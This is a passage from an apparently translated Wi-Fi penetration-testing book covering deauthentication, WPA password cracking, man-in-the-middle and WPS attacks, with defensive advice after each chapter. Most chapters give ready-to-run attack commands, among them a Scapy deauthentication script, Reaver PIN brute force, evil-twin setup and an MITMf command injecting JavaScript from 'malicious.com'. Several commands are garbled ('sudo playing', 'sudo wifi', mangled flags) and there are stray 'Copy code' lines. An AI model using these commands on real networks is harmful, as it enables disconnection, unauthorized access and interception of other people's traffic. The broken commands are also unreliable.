Traffic analysis involves inspecting captured packets to identify communication patterns. This
may include:
● Traffic Volume: Monitoring traffic volume can help identify spikes in activity that may
be related to attacks or anomalous behavior.
● Types of Traffic: Different types of traffic can indicate different types of activities. For
example, HTTP traffic may be related to web browsing, while FTP traffic may indicate
file transfers.
● Device Behavior: Analyzing the behavior of connected devices can help identify
compromised or suspicious devices. This may include monitoring the frequency of
deauthentications and reconnections.

Vulnerability Identification
Identifying vulnerabilities in your network is a critical step toward improving security. This may
include:
● Weak Passwords: Analyzing authentication packets can reveal weak or easily guessable
passwords. Tools like Aircrack-ng can be used to attempt to crack WPA/WPA2
passwords.
● Insecure Protocols: Identifying the use of insecure protocols, such as WEP, can reveal
weaknesses in network security.
● Inadequate Security Settings: Checking the AP's security settings, such as using
WPA/WPA2 and disabling WPS, can help identify inappropriate settings that need to be
corrected.
Analysis Reports
After capturing and analyzing network packets, it's important to document your findings in a
detailed report. A network analysis report should include all relevant information about identified
patterns and vulnerabilities, as well as recommendations for improvements.

Report Structure
A Wi-Fi network analysis report should follow a clear and concise structure:
● Introduction: Describe the scope of the analysis and test objectives. Include information
about the test environment, such as the network configuration and devices involved.
● Methodology: Detail the tools and techniques used to capture and analyze packets.
Include specific commands and procedures followed during the analysis.
● Results: Present findings in a clear and organized way. Use tables and graphs to visualize
captured data. Highlight identified patterns and vulnerabilities.
● Recommendations: Provide detailed recommendations to mitigate identified
vulnerabilities. This may include updating passwords, configuring stronger security
protocols, and implementing security best practices.

Report Example
The following is an example report structure for a Wi-Fi network analysis:
Introduction
This report details the security analysis of the "NetworkName" Wi-Fi network. The analysis was
conducted to identify vulnerabilities and provide recommendations to improve network security.
Methodology
The analysis was performed using the following tools and techniques:
● Wireshark for packet capture and analysis.
● Aircrack-ng for security auditing and password cracking.
● Kismet for network detection and passive capture.
Results
Traffic Volume
● Traffic volume was monitored over a 24-hour period. A peak in activity was observed
between 6pm and 8pm, corresponding to the time of greatest use by users.
Types of Traffic
● The analysis revealed that the majority of traffic was HTTP and HTTPS, indicating web
browsing and use of online services. Sporadic FTP traffic has been identified, which may
be related to file transfers.
Device Behavior
● The behavior of connected devices was analyzed. It has been observed that the device
with MAC address xx:xx:xx:xx:xx
showed a pattern of deauthentication and frequent reconnection, suggesting possible
attack attempts.
Identified Vulnerabilities
● Weak Passwords: Analysis of authentication packets revealed that the network password
is weak and easily guessed.
● Insecure Protocols: The use of the WEP protocol has been identified on a secondary
network, which is known to be vulnerable.
● Inadequate Security Configurations: Analysis revealed that WPS was enabled on the AP,
posing a significant security risk.
Recommendations
Password Update
● It is recommended that you immediately update your network password to a strong
password containing a combination of upper and lower case letters, numbers, and special
characters.
Configuring Security Protocols
● Disable the use of the WEP protocol and configure all networks to use WPA2 or WPA3.
Make sure all devices support new security protocols.
Disabling WPS
● Disable WPS on the AP to prevent brute force attacks that could exploit this vulnerability.
Continuous Monitoring
● Implement a continuous monitoring solution to detect suspicious activity and quickly
respond to potential threats. Tools like Wireshark and Kismet can be used to monitor the
network regularly.

Practical Analysis Examples


To illustrate how the tools and techniques discussed can be applied in practice, let's analyze an
example of packet capture and vulnerability identification.

Packet Capture with Wireshark


Start Capture: Open Wireshark and select the network interface to start capturing. Click the
capture button to start monitoring traffic.
Apply Filters: Use filters to focus on specific packages. For example, to filter only DHCP
packets:
text
dhcp
Analyze Packages: Examine captured packets to identify relevant information. For example,
analyzing DHCP packets can reveal new devices connected to the network.

Identifying Weak Passwords with Aircrack-


ng
Capture Authentication Packets: Use airodump-ng to capture packets from a specific network:
bash
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon

Perform Deauthentication Attack: Force a device to deauthenticate and capture the


authentication handshake:
bash
sudo airplay --deauth 0 -a 00:11:22:33:44:55 -c 66:77:88:99:AA:BB wlan0mon

Break the Password: Use aircrack-ng to try to crack the password using the capture file:
bash
sudo aircrack-ng -w wordlist.txt -b 00:11:22:33:44:55 capture-01.cap

Vulnerability Analysis with Kismet


1. Start Kismet: Open Kismet and configure the network interface to start detecting
networks.
2. Monitor Networks: Kismet passively detects and monitors networks, capturing
packets without transmitting data. Scan detected networks to identify security
configurations and vulnerabilities.
3. Identify Hidden Networks: Kismet can reveal hidden networks that do not
broadcast their SSID. This can help identify unauthorized or misconfigured access
points.

Analyzing Wi-Fi networks is an essential skill for cybersecurity professionals. Using tools such
as Wireshark, Aircrack-ng, Kismet and Fern WiFi Cracker, it is possible to capture and interpret
data packets, identify patterns and vulnerabilities, and generate detailed reports to improve
network security. The practical application of these techniques allows for effective and in-depth
analysis, providing valuable insights to protect networks against threats and ensure data integrity.
CHAPTER 4: DEAUTHENTICATION
ATTACKS

Fundamentals of Deauthentication Attacks


Deauthentication attacks are a common technique used on Wi-Fi networks to disrupt the
connectivity of wireless devices by forcing them to disconnect from an access point (AP). These
attacks exploit the way devices manage their Wi-Fi connections and can be a preliminary step to
more complex attacks, such as capturing WPA/WPA2 handshakes for password cracking.

How Deauthentication Attacks Work


In a deauthentication attack, an attacker sends spoofed deauthentication packets to the AP or
client. These packets cause the receiving device to believe that it has been instructed to
disconnect from the network. The 802.11 protocol used on Wi-Fi networks does not require
authentication or encryption for deauthentication packets, making these attacks relatively simple
to execute.
● Deauthentication Packages: These packets tell the device to disconnect from the
network. They can be directed to the client (client deauthentication) or to the AP (AP
deauthentication).
● Objective of the Attack: The goal can range from simply stopping service, forcing a
client to reconnect (capturing handshakes), or creating an environment for man-in-the-
middle attacks.

Execution Tools and Methods


There are several tools and methods to perform deauthentication attacks. Let's explore some of
the most common ones, like airplay-ng of the Aircrack-ng toolset, and how to use them in
practice.

Aireplay-ng
airplay-ng is a tool from the Aircrack-ng package used to inject packets into Wi-Fi networks. It
can be used to perform deauthentication attacks, among other types of attacks.
Installation:
bash
sudo apt install aircrack-ng
Monitor Mode: First, put the network interface in monitor mode:
bash
sudo airmon-ng start wlan0

Deauthentication Attack: Perform the deauthentication attack using airplay-ng. The following
command will send deauthentication packets to a specific client:
bash
sudo aireplay-ng --deauth 0 -a [BSSID] -c [CLIENT_MAC] wlan0mon

○ [BSSID]: The MAC address of the access point.


○ [CLIENT_MAC]: The MAC address of the client.
To deauthenticate all clients connected to the AP, use the following command:
bash
sudo airplay - deauth 0 - a [ BSSID ] wlan0mon

MDK3
MDK3 is another powerful tool for Wi-Fi penetration testing, capable of performing a variety of
attacks, including deauthentication.
Installation:
bash
sudo apt install mdk3

Deauthentication Attack: Use MDK3 to deauthenticate all clients on a network:


bash
sudo mdk3 wlan0mon d -b blacklist.txt

○ blacklist.txt: A file containing the BSSIDs of the APs you want to attack.

Scapy
Scapy is a powerful library for package manipulation in Python. Can be used to create custom
deauthentication scripts.
Installation:
bash
Copy code
sudo apt install python3-scapy

Deauthentication Script: Here is an example Python script using Scapy to send


deauthentication packets:
python
from scapy.all import *
interface = "wlan0mon"
ap_mac = "00:11:22:33:44:55"
client_mac = "66:77:88:99:AA:BB"
dot11 = Dot11(addr1=client_mac, addr2=ap_mac, addr3=ap_mac)
packet = RadioTap()/dot11/Dot11Deauth(reason=7)
sendp(packet, iface=interface, count=100, inter=0.1)
This script sends 100 deauthentication packets from AP with MAC address 00:11:22:33:44:55 to
client with MAC address 66:77:88:99:AA:BB.

Mitigation and Defense


Protecting a Wi-Fi network against deauthentication attacks is challenging due to the open nature
of the 802.11 protocol. However, there are several strategies and best practices to mitigate these
attacks.

Using WPA3
WPA3 is the latest version of the Wi-Fi security protocol and includes several improvements that
make deauthentication attacks more difficult.
● SAE (Simultaneous Authentication of Equals): WPA3 uses SAE for the authentication
process, making brute force attacks significantly more difficult. Improved encryption
also helps protect against deauthentication attacks.

Monitoring and Detection


Implementing monitoring systems can help detect deauthentication attacks in real time.
● Intrusion Detection Systems (IDS): Tools like Snort or Zeek can be configured to
monitor network traffic and alert on suspicious deauthentication packets.
● The kismet: Kismet can be used to detect deauthentication activity. Configure alerts to
notify you when deauthentication packets are detected.
Packet Filtering
Some advanced routers and enterprise APs offer packet filtering capabilities that can block
spoofed deauthentication packets.
● MAC Filtering: Configure access control lists (ACLs) to allow only specific devices on
the network.
● Deep Packet Inspection (DPI): DPI can be used to inspect and filter spoofed
deauthentication packets.

Network Segmentation
Segmenting the network can limit the impact of a deauthentication attack.
● Separate Networks for Different Devices: Configure separate networks for critical
devices and general-purpose devices. This limits the impact of an attack on one part of
the network.
● Use of VLANs: Implementing VLANs (Virtual Local Area Networks) can help isolate
different types of traffic and devices, making deauthentication attacks more difficult.

Firmware Update
Keeping the AP's firmware up to date is crucial to protect against known vulnerabilities.
● Regular Updates: Regularly check the manufacturer's website for firmware updates and
apply them as needed.

Case studies
Studying real cases of deauthentication attacks can provide valuable insights into how these
attacks are carried out and how defenses can be improved.

Case 1: Deauthentication Attack in a


Corporate Environment
Context: A company detected frequent interruptions in Wi-Fi connectivity, affecting employee
productivity.
Attack Execution: The attacker used airplay-ng to send deauthentication packets to devices
connected to the company's main AP. This forced devices to disconnect repeatedly, causing
outages.
Detection: The attack was detected using Kismet, which alerted network administrators to the
deauthentication activity.
Mitigation: The company has implemented the following measures:
● Updated the APs firmware.
● Configured WPA3 with SAE for more secure authentication.
● Implemented an IDS system to monitor deauthentication packets.
● Segmented the network using VLANs to isolate critical devices.

Case 2: Deauthentication Attack on a Home


Network
Context: A home user reported that his Wi-Fi network was constantly disconnecting his devices.
Attack Execution: The attacker, a malicious neighbor, used mdk3 to send deauthentication
packets to force user devices to disconnect.
Detection: The user used Wireshark to capture packets and identified the presence of
deauthentication packets.
Mitigation: The user has applied the following measures:
● Changed the Wi-Fi password to a strong password.
● Disabled WPS on the router.
● Updated the router's firmware to the latest version.
● Implemented MAC filtering to allow only authorized devices.

Case 3: Deauthentication Attack on a Public


Network
Context: A cafe offered free Wi-Fi to customers but faced frequent disconnection issues.
Attack Execution: The attacker used a custom Python script with Scapy to send
deauthentication packets, disrupting Wi-Fi service.
Detection: The network administrator used real-time monitoring tools to identify spikes in
deauthentication packets.
Mitigation: The following measures have been taken:
● WPA3 implementation with SAE.
● Updating APs to models with better security support.
● Use of IDS for continuous monitoring and alerts of suspicious activity.

Practical Examples of Execution and Defense


Attack Execution with Aireplay-ng
Put the Interface in Monitor Mode:
bash
sudo airmon-ng start wlan0

Capture Packets to Identify Clients and AP:


bash
sudo airodump wlan0mon

Perform the Deauthentication Attack: To deauthenticate a specific client:


bash
sudo airplay --deauth 0 -a 00:11:22:33:44:55 -c 66:77:88:99:AA:BB wlan0mon
To deauthenticate all clients:
bash
sudo playing --deauth 0 -a 00:11:22:33:44:55 wlan0mon

Implementation of Defenses
1. Configure WPA3 on the Router: Access the router settings and change the
network security to WPA3. If WPA3 is not available, use WPA2 with a strong,
unique password.
Monitoring with Snort: Install and configure Snort to monitor deauthentication packets:
bash
sudo apt install snort
2. Add deauthentication packet detection rules in the Snort configuration file.
3. Disabling WPS: Access the router's administration interface and disable the WPS
functionality to prevent related attacks.
4. MAC Filtering: Configure an access control list (ACL) on the router to allow only
authorized devices.
5. Firmware Updates: Regularly check your router manufacturer's website for
firmware updates and apply them as needed.

Deauthentication attacks are a common and effective technique used to disrupt the connectivity
of Wi-Fi networks. Using tools such as airplay-ng, MDK3 and Scapy, these attacks can be
carried out relatively easily. However, there are several mitigation and defense strategies,
including the use of WPA3, monitoring and detection, packet filtering, network segmentation,
and firmware updating. Real-world case studies illustrate the effectiveness of these strategies in
protecting against deauthentication attacks, highlighting the importance of a multi-pronged
approach to ensuring the security of Wi-Fi networks.
CHAPTER 5: WI-FI PASSWORD
CRACKING

Wi-Fi Password Attack Methods


The security of Wi-Fi networks depends heavily on the strength of the passwords used to protect
access. Cracking these passwords could allow an attacker to access the network, intercept data,
and even compromise connected devices. There are several methods used to crack Wi-Fi
passwords, each with its own techniques and tools.

Handshakes Capture
The first step in many Wi-Fi password attacks is to capture the WPA/WPA2 handshake. This
process occurs when a device connects to a Wi-Fi network, allowing the attacker to capture the
packets necessary to crack the password.
Use of Airodump-ng:
bash
sudo airodump-ng -c [canal] --bssid [BSSID] -w capture wlan0mon
● This command captures the handshake, which is saved to a file .cap.

Reaver Attack
Reaver is a tool that exploits Wi-Fi Protected Setup (WPS) vulnerability to recover WPA/WPA2
password.
Use of Reaver:
bash
sudo reaver -i wlan0mon -b [BSSID] -vv
● This command attempts to guess the WPS PIN, which can be used to recover the
password.

Phishing attack
Phishing is a technique in which the attacker creates a fake login page to capture the user's
password. On Wi-Fi networks, this can be done by setting up a fake access point that asks for the
original network's password.
Password Cracking Tools
There are several specialized tools for cracking Wi-Fi passwords, each with its specific
characteristics and uses.

Aircrack-ng
Aircrack-ng is one of the most popular tools for cracking WEP and WPA/WPA2 passwords. It
uses dictionary attack and brute force techniques to try to guess the password.
Installation:
bash
sudo apt install aircrack-ng

WPA/WPA2 Password Cracking:


bash
sudo aircrack-ng -w wordlist.txt -b [BSSID] capture-01.cap
This command uses a dictionary file (wordlist.txt) to try to guess the password based on the
captured handshake.

Hashcat
Hashcat is a powerful password cracking tool that can use the GPU to significantly increase
cracking speed. Supports a wide range of hash algorithms, including WPA/WPA2.
Installation:
bash
sudo apt install hashcat

Basic Use:
Converting the handshake .cap for format Hashcat:
bash
hcxpcaptool -z capture.hccapx capture-01.cap

Cracking the password:


bash
hashcat -m 2500 capture.hccapx wordlist.txt
John the Ripper
John the Ripper is another password cracking tool that can be used for WPA/WPA2. Although
most commonly used for password hashes, it also supports WPA/WPA2.
Installation:
bash
sudo apt install john

Basic Use:
Converting the handshake .cap for John format:
bash
hcxpcaptool -o capture.john capture-01.cap

Cracking the password:


bash
john --wordlist=wordlist.txt capture.john

Brute Force and Dictionary Attacks


Brute force and dictionary attacks are two of the most common techniques used to crack Wi-Fi
passwords.

Brute Force Attacks


In brute force attacks, the attacker tries every possible combination of characters until he finds
the correct password. This method is extremely time-consuming and resource-intensive,
especially for long and complex passwords.
Uso com Aircrack-ng:
bash
sudo aircrack-ng -a2 -b [BSSID] -w brute-force-list.txt capture-01.cap
● Where brute-force-list.txt is a file containing all possible combinations of passwords.

Dictionary Attacks
Dictionary attacks use a predefined list of common passwords or words that can be used as
passwords. This method is faster than brute force, but depends on the quality of the word list.
Word List Creation: To create a custom word list, use tools like Crunch:
bash
sudo apt install crunch
crunch 8 12
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 -o
wordlist.txt
This command creates a list of words between 8 and 12 characters long, using uppercase letters,
lowercase letters, and numbers.
Use with Hashcat:
bash
hashcat -m 2500 -a 0 capture.hccapx wordlist.txt

Password Cracking Protection


Protecting your Wi-Fi network from password cracking attacks is essential to maintaining
security. Here are some best practices for securing your network.

Strong and Complex Passwords


Use long, complex passwords that include a combination of uppercase and lowercase letters,
numbers, and special characters. Avoid using common words or personal information.
Strong Password Example:
text
3x@mpl3P@$$w0rd!

Regularly updating passwords


Change your passwords periodically to reduce the window of opportunity for an attacker.

Using WPA3
WPA3 offers significant security improvements compared to WPA2, including better protection
against brute force attacks.
● WPA3 Configuration: Access the router's administration interface and change the
security protocol to WPA3. If WPA3 is not available, use WPA2 with a strong password.

Disabling WPS
Disable Wi-Fi Protected Setup (WPS) on your router to prevent attacks that exploit this
vulnerability.
● Disabling WPS: Access the router's administration interface and disable the WPS option.

MAC Filtering
Implement MAC address filtering to allow only authorized devices onto the network.
● MAC Filtering Configuration: Access the router's administration interface and
configure MAC address filtering by adding the MAC addresses of authorized devices.

Network Segmentation
Segmenting the network can limit the impact of an attack by isolating different types of traffic
and devices.
● Use of VLANs: Configure VLANs on the router to isolate traffic from critical devices
and general-purpose devices.

Monitoring and Detection


Implement monitoring systems to detect password cracking attempts and other suspicious
activity.
● Use of IDS/IPS: Tools like Snort or Zeek can be configured to monitor network traffic
and alert you to suspicious activity, such as password cracking attempts.

Practical Examples of Password Cracking


To illustrate how the tools and techniques discussed can be applied in practice, here are some
examples of executing password cracking attacks.

Handshake Capture with Airodump-ng


Put the Interface in Monitor Mode:
bash
sudo airmon-ng start wlan0
Capture the Handshake:
bash
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon

Force Deauthentication to Capture the Handshake:


bash
sudo airplay --deauth 10 -a 00:11:22:33:44:55 -c 66:77:88:99:AA:BB wlan0mon

Password Cracking with Aircrack-ng


Dictionary File Usage:
bash
sudo aircrack-ng -w wordlist.txt -b 00:11:22:33:44:55 capture-01.cap

Brute Force with Aircrack-ng: Create a password list file with all possible combinations and
use it with Aircrack-ng:
bash
crunch 8 12
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 -o brute-
force-list.txt
sudo aircrack-ng -w brute-force-list.txt -b 00:11:22:33:44:55 capture-01.cap

Using Hashcat
Convert Handshake to Hashcat Format:
bash
Copy code
hcxpcaptool -z capture.hccapx capture-01.cap

Password Cracking with Hashcat:


bash
hashcat -m 2500 capture.hccapx wordlist.txt
Wi-Fi password cracking is a crucial technique that involves varied methods including capturing
handshakes, brute force and dictionary attacks, and the use of specialized tools such as Aircrack-
ng, Hashcat and John the Ripper. Protecting your network against these attacks requires
implementing strong and complex passwords, regularly updating passwords, using WPA3,
disabling WPS, MAC filtering, network segmentation, and continuous monitoring.
Understanding and applying these techniques allows cybersecurity professionals to effectively
secure Wi-Fi networks, ensuring data security and network integrity.
CAPÍTULO 6: ATAQUES MAN-IN-THE-
MIDDLE

Introduction to MITM Attacks


Man-in-the-Middle (MITM) attacks are one of the most serious and common threats on Wi-Fi
networks. In a MITM attack, the attacker intercepts and possibly modifies communication
between two parties without them knowing. This allows the attacker to steal sensitive
information, such as login credentials and personal data, or inject malicious data into the
communication.

MITM Attack Concept


A MITM attack occurs when an attacker positions himself between two devices that are
communicating. The attacker can then intercept, record, and alter the data transmitted between
these devices. There are several techniques for carrying out a MITM attack, including ARP
spoofing, DNS redirection, and creating fake access points.

Executing MITM on Wi-Fi Networks


To perform a MITM attack on a Wi-Fi network, the attacker must first gain access to the
network. Once connected, the attacker can use various techniques to intercept network traffic.

Spoofing de ARP
ARP (Address Resolution Protocol) spoofing is a common technique used in MITM attacks.
ARP is responsible for mapping IP addresses to MAC addresses on the local network. ARP
spoofing involves sending spoofed ARP messages to associate the attacker's MAC address with
the IP address of a legitimate device on the network.
● Using Ettercap: Ettercap is a powerful tool for performing ARP spoofing attacks.
Installation:
bash
sudo apt install ettercap-graphical

Execution:
Start Ettercap in graphical mode:
bash
sudo ettercap -G

Select the network interface and start sniffing.


Add victims (target devices) and select "ARP poisoning" as the attack method.
Launch the attack to intercept traffic between victims.

DNS Redirection
DNS redirection involves manipulating DNS responses to redirect traffic destined for a
legitimate website to a malicious website controlled by the attacker.
● Using Dnsmasq: Dnsmasq is a tool that can be configured to provide DNS and DHCP
services, facilitating DNS redirection.
Installation:
bash
sudo apt install dnsmasq

Settings: Edit the Dnsmasq configuration file (/etc/dnsmasq.conf) to add redirection entries:
text
address=/example.com/192.168.1.100
In this example, any request for example.com will be redirected to 192.168.1.100, the IP
address of the malicious server.

Creating Fake Access Points


Creating a fake access point (Evil Twin) is another technique used in MITM attacks. The
attacker creates an access point with the same SSID as a legitimate access point, tricking users
into connecting to the fake access point.
● Uso do Airbase-ng: Airbase-ng is a tool from the Aircrack-ng package used to create
fake access points.
Installation:
bash
sudo apt install aircrack-ng

Execution:
Put the network interface in monitor mode:
bash
sudo airmon-ng start wlan0

Create the fake access point:


bash
sudo airbase-ng -e "NomeDoSSID" wlan0mon

This command creates an access point with the SSID "SSIDName". Users who connect
to this access point will have their traffic intercepted by the attacker.

Tools Used in MITM Attacks


Several tools make it easy to perform MITM attacks on Wi-Fi networks. Some of the most
popular include Ettercap, Wireshark, and MITMf.

Ettercap
Ettercap is a network sniffing and spoofing tool that supports various MITM techniques,
including ARP spoofing and data injection.
Installation:
bash
sudo apt install ettercap-graphical

Functionalities:
○ ARP spoofing
○ DNS spoofing
○ Packet injection
○ Password capture

Wireshark
Wireshark is a packet analysis tool that can be used to capture and analyze network traffic
intercepted in a MITM attack.
Installation:
bash
sudo apt install wireshark
Functionalities:
○ Packet capture and analysis
○ Advanced filters to isolate specific traffic
○ Support for hundreds of network protocols

MITMf (Man-in-the-Middle Framework)


MITMf is an extensible framework for MITM attacks, offering a wide range of plugins for
various attack techniques.
● Installation: MITMf can be installed from the source code available on GitHub.
Repository Cloning:
bash
git clone https://github.com/byt3bl33d3r/MITMf
cd MITMf
sudo python setup.py install

● Execution: MITMf can be used for ARP spoofing attacks, DNS redirection, code
injection, and more.
Example of use:
bash
sudo mitmf --arp --spoof --gateway 192.168.1.1 --target 192.168.1.2 --inject --js-url
http://malicious.com/payload.js
This command performs an ARP spoofing attack by redirecting the victim's traffic and
injecting a malicious JavaScript script.

Prevention and Detection


Protecting Wi-Fi networks against MITM attacks requires a combination of best security
practices, monitoring tools, and user education. The following are some effective strategies for
preventing and detecting MITM attacks.

Using HTTPS
Using HTTPS to encrypt traffic between the client and server is one of the most effective ways to
protect against MITM attacks. HTTPS ensures that transmitted data is encrypted, making it
useless to an attacker who manages to intercept it.
● SSL/TLS certificates: Ensure that all websites and web services use valid SSL/TLS
certificates to ensure traffic encryption.
VPN implementation
Using virtual private networks (VPNs) can protect data transmitted over insecure, public Wi-Fi
networks. A VPN creates an encrypted tunnel between the user's device and the VPN server,
protecting data from interception.
● VPN Services: There are several VPN services available such as NordVPN, ExpressVPN
and others that can be configured to secure network traffic.

Network Segmentation
Segmenting the network can limit the impact of a MITM attack. For example, isolating critical
devices into a separate VLAN can help protect those devices from attacks that target the overall
network.
● Use of VLANs: Configure VLANs on the router and switches to isolate different types of
traffic and devices.

Network Monitoring
Implementing network monitoring systems can help detect suspicious activity such as ARP
spoofing and DNS redirection, enabling rapid response to MITM attacks.
● Intrusion Detection Systems (IDS): Tools like Snort or Zeek can be configured to
monitor network traffic and alert you to suspicious activity.

Configuring ARP Spoofing Protection


Some routers and switches offer protection against ARP spoofing. Enabling these settings can
help prevent MITM attacks based on ARP spoofing.
● Configuration on the Router: Access the router's administration interface and enable
ARP spoofing protection, if available.

User Education
Educating users about security risks and best practices can help prevent MITM attacks. Teach
users to check the websites they visit for HTTPS and to be wary of unknown Wi-Fi access
points.
● Good Security Practices:
○ Check the presence of HTTPS on the websites you access.
○ Do not connect to unknown Wi-Fi hotspots.
○ Use VPNs when accessing public Wi-Fi networks.
Practical Examples of Execution and Defense
Performing ARP Spoofing with Ettercap
Install and Start Ettercap:
bash
sudo apt install ettercap-graphical
sudo ettercap -G

Select Network Interface and Start Sniffing: Select the network interface used and click "Start
Sniffing".
Add Victims and Perform ARP Spoofing: Add the router's IP address as a victim and the target
device's IP address as another victim. Select "ARP poisoning" and start the attack.

Performing DNS Redirection with Dnsmasq


Instalar Dnsmasq:
bash
sudo apt install dnsmasq

Configure DNS Redirection: Edit the file /etc/dnsmasq.conf and add entries for DNS
redirection:
text
address=/example.com/192.168.1.100

Start Dnsmasq:
bash
sudo systemctl restart dnsmasq

Creating Fake Access Point with Airbase-ng


Put the Interface in Monitor Mode:
bash
sudo airmon-ng start wlan0
Create the Fake Access Point:
bash
sudo airbase-ng -e "NomeDoSSID" wlan0mon

ARP Spoofing Protection Implementation


1. Configure Protection on the Router: Access the router's administration interface
and navigate to the security settings. Enable ARP spoofing protection, if available.
2. Use of Monitoring Tools: Install and configure monitoring tools like Snort or Zeek
to detect and alert on ARP spoofing activities.

VPN Configuration
1. Choose a VPN Service: Sign up for a reliable VPN service like NordVPN or
ExpressVPN.
2. VPN Client Configuration: Follow your VPN provider's instructions to install and
configure the VPN client on your device.
3. Connect to VPN: Connect to VPN whenever you access public or unsecured Wi-Fi
networks.

Man-in-the-Middle attacks pose a significant threat to Wi-Fi networks, allowing attackers to


intercept and modify communications without being detected. Understanding the techniques for
executing these attacks, such as ARP spoofing, DNS redirection, and creating fake access points,
is crucial for cybersecurity professionals. Tools like Ettercap, Wireshark, and MITMf make it
easier to execute these attacks, but there are also effective prevention and detection strategies,
including the use of HTTPS, VPNs, network segmentation, continuous monitoring, and user
education. Practical application of these defense techniques helps protect Wi-Fi networks against
the persistent threat of MITM attacks, ensuring data security and communications integrity.
CHAPTER 7: WPS VULNERABILITY
EXPLOITATION

What is WPS and Its Vulnerabilities


Wi-Fi Protected Setup (WPS) is a feature that was introduced to make it easier to set up secure
Wi-Fi networks, especially for home users. The main idea of WPS is to simplify the process of
connecting new devices to a Wi-Fi network without having to manually enter the security key.
There are several methods for using WPS, including using an eight-digit PIN, a physical button
on the router (push-button), and NFC (Near Field Communication) methods.

How WPS works


WPS works through an authentication process that aims to simplify connecting to a Wi-Fi
network. Here are the most common methods:
● Eight-Digit PIN: An eight-digit numeric PIN is used to connect devices to the network.
This PIN is usually printed on the router or displayed in the configuration interface.
● Push-Button (PBC): Pressing a physical button on both the router and the client device
to establish a connection.
● Near Field Communication (NFC): Touch the device to the router to connect
automatically (less common).

WPS Vulnerabilities
Despite the convenience offered by WPS, it has several significant vulnerabilities, especially in
the PIN authentication method:
● Brute Force PIN Attack: The eight-digit PIN is vulnerable to brute force attacks.
Because the PIN is divided into two four-digit halves, an attacker only needs to guess
10,000 combinations for the first half and 1,000 for the second, totaling 11,000 attempts
at most.
● Predictable PIN: Some routers generate predefined or easily predictable PINs, which
makes attacks even easier.
● Implementation Failures: Several implementations of WPS in routers contain flaws that
can be exploited by attackers.

WPS Exploitation Methods


There are several techniques and tools that allow the exploitation of WPS vulnerabilities to
compromise the security of a Wi-Fi network. The most common and effective is the WPS PIN
brute force attack.

Brute Force Attack on WPS PIN


WPS PIN brute force attack is a direct method of exploiting the vulnerability in the WPS
authentication process. The attacker tries all possible PIN combinations until he finds the correct
one.
● Reaver Tool: Reaver is one of the most popular tools to perform WPS PIN brute force
attacks. It systematically tries all possible PINs until it finds the right one.
Installation:
bash
sudo apt install reaver

Basic Use:
bash
sudo reaver -i wlan0mon -b [BSSID] -vv

■ -i wlan0mon: Specifies the network interface in monitor mode.


■ -b [BSSID]: Specifies the MAC address of the access point.
■ -vv: Enables verbose mode to display attack details.
Attack Execution:
bash
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -vv
Reaver will begin trying all possible WPS PIN combinations until it finds the correct one
and reveals the WPA/WPA2 key.

Alternative Exploration Methods


In addition to brute force attacks, there are other methods that can be used to exploit
vulnerabilities in WPS:
Pixie Dust Attack: Pixie Dust is an offline attack against WPS that exploits flaws in the key
generation process. Works best on routers that use weak pseudo-random number generators.
Pixiewps Tool:
Installation:
bash
sudo apt install pixiewps
Use in conjunction with Reaver:
bash
sudo reaver -i wlan0mon -b [BSSID] -K 1
The parameter -K 1 Activates Pixie Dust mode.
Attack with Bully: Bully is another tool that can be used to exploit vulnerabilities in WPS.
Installation:
bash
sudo apt install bully

Basic Use:
bash
sudo bully wlan0mon -b [BSSID] -v

Specific Tools for WPS


There are several tools designed specifically to exploit vulnerabilities in WPS. In addition to
Reaver, Pixiewps, and Bully, other popular tools include:

Wash
Wash is a tool used to identify access points that have WPS enabled. It is often used before
starting a Reaver attack.
Installation:
bash
sudo apt install reaver

Basic Use:
bash
sudo wash -i wlan0mon
This command lists all access points that have WPS enabled, along with information about the
WPS status.

Wifite
Wifite is an automated tool that simplifies the process of attacking Wi-Fi networks, including
WPS attacks. It integrates several other tools, such as Reaver, Aircrack-ng, and Bully, to provide
a complete solution.
Installation:
bash
sudo apt install wifite

Basic Use:
bash
sudo wifi
Wifite scans Wi-Fi networks in range and allows you to select which networks to attack. It
automates the attack process using appropriate tools.

Strengthening WPS Security


While exploiting WPS vulnerabilities is a significant threat, there are several steps you can take
to strengthen the security of your Wi-Fi network.

Disabling WPS
The most effective measure to protect against WPS attacks is to completely disable WPS on your
router. This eliminates the vulnerability, preventing attackers from using WPS to compromise
the network.
● Deactivation via the Router's Web Interface:

1. Access the router's administration interface.


2. Navigate to WPS settings.
3. Disable WPS and save changes.

Using WPA3
WPA3 is the latest version of the Wi-Fi security protocol and offers significant improvements
compared to WPA2, including greater protection against brute force attacks.
● WPA3 Configuration: If the router supports WPA3, configure the network to use WPA3
instead of WPA2.

Strong and Complex Passwords


Even though WPS is disabled, it is crucial to use strong and complex Wi-Fi passwords to protect
the network against other types of attacks.
Strong Password Example:
text
Complex@Password123!

Firmware Update
Keeping your router's firmware up to date is essential to ensure that all known vulnerabilities are
patched. Regularly check your router manufacturer's website for firmware updates and apply
them as needed.
● Update Procedure:

1. Download the latest firmware from the manufacturer's website.


2. Access the router's administration interface.
3. Navigate to the firmware update section and upload the downloaded file.
4. Follow the instructions to complete the update.

Network Monitoring
Implementing network monitoring systems can help detect attack attempts in real time.
Monitoring tools like Snort or Zeek can be configured to alert you to suspicious activity.
Snort Installation:
bash
sudo apt install snort

Basic Snort Setup: Configure Snort to monitor network traffic and generate alerts for suspicious
activity.

User Education
Educating users about the importance of Wi-Fi network security and the threats associated with
WPS is critical. Teach users to recognize signs of network compromise and take preventive
measures.
● Good Security Practices:
○ Do not share the WPS PIN with third parties.
○ Be wary of suspicious Wi-Fi connections.
○ Use VPNs when accessing public Wi-Fi networks.

Practical Examples of Exploration and


Defense
Exploration with Reaver
Put the Interface in Monitor Mode:
bash
sudo airmon-ng start wlan0

Identify Access Points with Wash:


bash
sudo wash -i wlan0mon

Run Reaver:
bash
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -vv

Exploration with Pixiewps


Instalar Pixiewps:
bash
sudo apt install pixiewps

Run Reaver with Pixiewps:


bash
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -K 1

Defense: Disabling WPS


1. Access the Router Administration Interface: Open a browser and enter the IP
address of the router (usually 192.168.1.1).
